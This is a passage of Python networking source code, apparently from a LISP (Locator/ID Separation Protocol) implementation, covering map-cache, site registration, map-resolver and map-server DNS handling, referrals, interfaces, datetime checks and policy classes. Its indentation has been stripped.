while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (rloc.rle_name in lisp_rle_list):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid(object):
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping(object):
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in list(lisp_group_mapping_list.values()):
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site(object):
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid(object):
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in list(self.individual_registrations.values()):
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in list(self.individual_registrations.values()):
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (addr in new_rle): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (list(old_rle.keys()) == list(new_rle.keys())): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
list(old_rle.keys()), list(new_rle.keys())))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr(object):
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in list(lisp_map_resolvers_list.values()):
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (key not in lisp_map_resolvers_list): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root(object):
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral(object):
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in list(self.referral_set.values()):
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node(object):
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms(object):
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = list(lisp_map_servers_list.values())[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in list(lisp_map_servers_list.values()):
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (key not in lisp_map_servers_list): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface(object):
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime(object):
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match(object):
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy(object):
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if (name in lisp_geo_list) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if (name in lisp_elp_list) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if (name in lisp_rle_list) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if (name in lisp_json_list) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub(object):
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
self.eid_prefix = None
#enddef
def add(self, eid_prefix):
self.eid_prefix = eid_prefix
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (eid not in lisp_pubsub_cache):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (self.xtr_id in pubsub):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
